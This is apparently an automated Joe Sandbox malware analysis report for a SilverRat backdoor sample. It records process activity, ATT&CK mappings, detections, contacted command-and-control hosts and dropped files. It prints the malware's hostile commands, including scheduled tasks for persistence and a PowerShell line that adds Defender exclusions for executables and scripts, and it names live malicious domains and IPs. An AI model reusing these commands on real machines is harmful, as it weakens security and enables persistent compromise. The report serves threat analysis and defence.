                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exeJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exitJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeQueries volume information: C:\Users\user\Desktop\RLesaPFXew.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\java\$77java.exeQueries volume information: C:\Users\user\java\$77java.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\java\$77java.exeQueries volume information: C:\Users\user\java\$77java.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: RLesaPFXew.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\java\$77java.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts1
                  Exploitation for Client Execution                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  Input Capture                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Input Capture                  		1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts21
                  Scheduled Task/Job                  		21
                  Scheduled Task/Job                  		21
                  Scheduled Task/Job                  		11
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron11
                  Registry Run Keys / Startup Folder                  		11
                  Registry Run Keys / Startup Folder                  		1
                  Software Packing                  		NTDS11
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552938 Sample: RLesaPFXew.exe Startdate: 09/11/2024 Architecture: WINDOWS Score: 100 59 23.ip.gl.ply.gg 2->59 61 discordapp.com 2->61 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 Antivirus / Scanner detection for submitted sample 2->73 75 9 other signatures 2->75 10 RLesaPFXew.exe 1 8 2->10         started        14 $77java.exe 3 2->14         started        signatures3 process4 file5 55 C:\Users\user\java\$77java.exe, PE32+ 10->55 dropped 57 C:\Users\user\AppData\...\RLesaPFXew.exe.log, CSV 10->57 dropped 85 Creates autostart registry keys to launch java 10->85 87 Uses cmd line tools excessively to alter registry or file data 10->87 16 cmd.exe 1 10->16         started        18 attrib.exe 1 10->18         started        20 attrib.exe 1 10->20         started        signatures6 process7 process8 22 $77java.exe 14 3 16->22         started        26 conhost.exe 16->26         started        28 timeout.exe 1 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        dnsIp9 63 23.ip.gl.ply.gg 147.185.221.23, 49711, 49744, 49796 SALSGIVERUS United States 22->63 65 discordapp.com 162.159.133.233, 443, 49710 CLOUDFLARENETUS United States 22->65 77 Antivirus detection for dropped file 22->77 79 Multi AV Scanner detection for dropped file 22->79 81 Machine Learning detection for dropped file 22->81 83 2 other signatures 22->83 34 powershell.exe 23 22->34         started        37 schtasks.exe 1 22->37         started        39 schtasks.exe 1 22->39         started        41 2 other processes 22->41 signatures10 process11 signatures12 67 Loading BitLocker PowerShell Module 34->67 43 conhost.exe 34->43         started        45 WmiPrvSE.exe 34->45         started        47 conhost.exe 37->47         started        49 conhost.exe 39->49         started        51 conhost.exe 41->51         started        53 conhost.exe 41->53         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  RLesaPFXew.exe66%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                  RLesaPFXew.exe100%AviraHEUR/AGEN.1313050
                  RLesaPFXew.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\java\$77java.exe100%AviraHEUR/AGEN.1313050
                  C:\Users\user\java\$77java.exe100%Joe Sandbox ML
                  C:\Users\user\java\$77java.exe66%ReversingLabsByteCode-MSIL.Backdoor.Crysan

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  23.ip.gl.ply.gg100%Avira URL Cloudmalware
                  http://microsoft.co4yL0%Avira URL Cloudsafe
                  https://g.top4top.io/p_2522c7w8u1.png0%Avira URL Cloudsafe
                  https://g.top4top.io/p_2522c7w8u0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  23.ip.gl.ply.gg
                  		147.185.221.23
                  		truetrue
                    		unknown
                    discordapp.com
                    		162.159.133.233
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      23.ip.gl.ply.ggtrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://discordapp.com$77java.exe, 0000000D.00000002.3389411382.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://g.top4top.io/p_2522c7w8u$77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://g.top4top.io/p_2522c7w8u1.png$77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.microsoft$77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRLesaPFXew.exe, 00000000.00000002.2158375099.0000000003621000.00000004.00000800.00020000.00000000.sdmp, $77java.exe, 0000000D.00000002.3389411382.0000000003689000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.microsoft.co$77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://discordapp.com$77java.exe, 0000000D.00000002.3389411382.00000000039CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://microsoft.co4yL$77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                147.185.221.23
                                		23.ip.gl.ply.ggUnited States
                                		12087SALSGIVERUStrue
                                162.159.133.233
                                		discordapp.comUnited States
                                		13335CLOUDFLARENETUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1552938
                                Start date and time:2024-11-09 22:52:08 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 11s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:28
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:RLesaPFXew.exe
                                renamed because original name is a hash value
                                Original Sample Name:aa80b2971f14c91c4a09162357188bf73d0f9934.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winEXE@32/10@2/2
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 14
                                • Number of non-executed functions: 2
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target $77java.exe, PID 3000 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: RLesaPFXew.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                16:53:07API Interceptor1x Sleep call for process: RLesaPFXew.exe modified
                                16:53:12API Interceptor16x Sleep call for process: powershell.exe modified
                                22:53:11Task SchedulerRun new task: $77java.exe path: C:\Users\user\java\$77java.exe s>"\$77java.exe" /AsAdmin
                                22:53:11Task SchedulerRun new task: java_Task-DAILY-21PM path: %MyFile%

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                147.185.221.23rboancbWce.exeGet hashmaliciousXWormBrowse
                                  dUoETPmfo3.exeGet hashmaliciousOrcusBrowse
                                    MAqlwGvuGr.exeGet hashmaliciousSheetRatBrowse
                                      V2Avz54IzW.exeGet hashmaliciousXWormBrowse
                                        explorers.exeGet hashmaliciousXWormBrowse
                                          wilde.exe.bin.exeGet hashmaliciousXWormBrowse
                                            7jgFDJY46m.exeGet hashmaliciousNjratBrowse
                                              17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                r8gcHFIf3x.exeGet hashmaliciousXWormBrowse
                                                  0eVxwphG1t.exeGet hashmaliciousXWormBrowse
                                                    162.159.133.233Cheat_Lab_2.7.2.msiGet hashmaliciousLummaC StealerBrowse
                                                    • cdn.discordapp.com/attachments/1175030470057136169/1175030979925135361/9
                                                    Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                    • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                    Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                    • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                    DHL_SHIPMENTS.exeGet hashmaliciousAsyncRAT, FormBookBrowse
                                                    • cdn.discordapp.com/attachments/1012640888754819173/1012643262537928734/DHL_SHIPMENTS_Olorqccl.bmp
                                                    SecuriteInfo.com.W32.FakeDoc.CY.genEldorado.18918.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • cdn.discordapp.com/attachments/956928735397965906/1006148111393116200/yXfZJqhIAtCWEPINOAX189.thn
                                                    64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                                                    • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                    PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousAveMariaBrowse
                                                    • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
                                                    BFSdrqaAvS.exeGet hashmaliciousAmadey RedLineBrowse
                                                    • cdn.discordapp.com/attachments/878034206570209333/908436663947124756/slhost.exe
                                                    GR01DtRd0N.exeGet hashmaliciousVidarBrowse
                                                    • cdn.discordapp.com/attachments/575791168713916457/896907138390192158/ETH2.exe
                                                    update[1].exeGet hashmaliciousUnknownBrowse
                                                    • cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    discordapp.comSecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                                                    • 162.159.135.233
                                                    segura.vbsGet hashmaliciousRemcosBrowse
                                                    • 162.159.135.233
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                    • 162.159.129.233
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                    • 162.159.134.233
                                                    LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.135.233
                                                    Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.133.233
                                                    xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.135.233
                                                    FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.134.233
                                                    FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.135.233
                                                    NdEIhUToOm.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                    • 162.159.134.233
                                                    23.ip.gl.ply.ggr8gcHFIf3x.exeGet hashmaliciousXWormBrowse
                                                    • 147.185.221.23
                                                    q0SpP6HxtE.exeGet hashmaliciousXWormBrowse
                                                    • 147.185.221.23

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                    • 104.26.13.205
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    New Fax Notification.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 172.64.41.3
                                                    x8AH98H0eQ.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.56.70
                                                    file.exeGet hashmaliciousLummaC Stealer, StealcBrowse
                                                    • 188.114.97.3
                                                    https://qrco.de/bfYBpcGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 104.18.95.41
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 188.114.97.3
                                                    zGHItMC5Zc.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    SALSGIVERUSmips.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 147.176.207.108
                                                    rboancbWce.exeGet hashmaliciousXWormBrowse
                                                    • 147.185.221.23
                                                    dUoETPmfo3.exeGet hashmaliciousOrcusBrowse
                                                    • 147.185.221.23
                                                    MAqlwGvuGr.exeGet hashmaliciousSheetRatBrowse
                                                    • 147.185.221.23
                                                    V2Avz54IzW.exeGet hashmaliciousXWormBrowse
                                                    • 147.185.221.23
                                                    explorers.exeGet hashmaliciousXWormBrowse
                                                    • 147.185.221.23
                                                    wilde.exe.bin.exeGet hashmaliciousXWormBrowse
                                                    • 147.185.221.23
                                                    7jgFDJY46m.exeGet hashmaliciousNjratBrowse
                                                    • 147.185.221.23
                                                    173053704588c2a0238ac539c47055690b9c96a4c731d94cbd055f2efb823211a11ddf1811931.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                    • 147.185.221.19
                                                    x86_32.elfGet hashmaliciousGafgytBrowse
                                                    • 216.221.14.221

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                    • 162.159.133.233
                                                    seethebestthingswithentirelifetaggreatwithmebestofthem.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                    • 162.159.133.233
                                                    creatbesthingswithbettersytelgivenmebestthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                    • 162.159.133.233
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 162.159.133.233
                                                    DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                    • 162.159.133.233
                                                    Purchase_order08112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                    • 162.159.133.233
                                                    WMdKM7E5Yg.exeGet hashmaliciousQuasarBrowse
                                                    • 162.159.133.233
                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                    • 162.159.133.233
                                                    IsVcdKSMbE.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.133.233
                                                    IsVcdKSMbE.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.133.233

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77java.exe.log

                                                    Download File
                                                    Process:C:\Users\user\java\$77java.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):859
                                                    Entropy (8bit):5.379735105545312
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Khk:MxHKQ71qHGIs0HKCYHKGSI6ok
                                                    MD5:66903BF8F31D4DE1B691C99CF8812A8A
                                                    SHA1:6A49612CB1C2356F176B1B2E5481FB3CD0CB4289
                                                    SHA-256:C09B65A3BA4819DAA12705C8C48400AD8F80B3B779954C14B9679396D252AF42
                                                    SHA-512:A96F5D88E7B7A1C36D77AA9A42CA3513B70261F9B494F387A46F1DA01934E05F9659A0E8512D677DFC8602254C230CC7F370A83B916C329F908B645C5A2C247D
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RLesaPFXew.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):1305
                                                    Entropy (8bit):5.376949986661823
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhBsXE4Npp+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6okHNpp+vU
                                                    MD5:12F2EE5E3A0DB26E8E1314AA79342433
                                                    SHA1:24FDDE745B1AC21277129001357B38CC05079277
                                                    SHA-256:3E515165812050CFEA5D52EB95B0794A79E577AAF171B4C7FD7A32585E16C338
                                                    SHA-512:0C887455EB381DE55764A52DA4A9F1C8884FA76AE56F49B95D20D142300D6BB7F8874099847BBEF345A4D8931E4C475AE3CE86912A346CDED68B6DEE635C5CEF
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1510207563435464
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
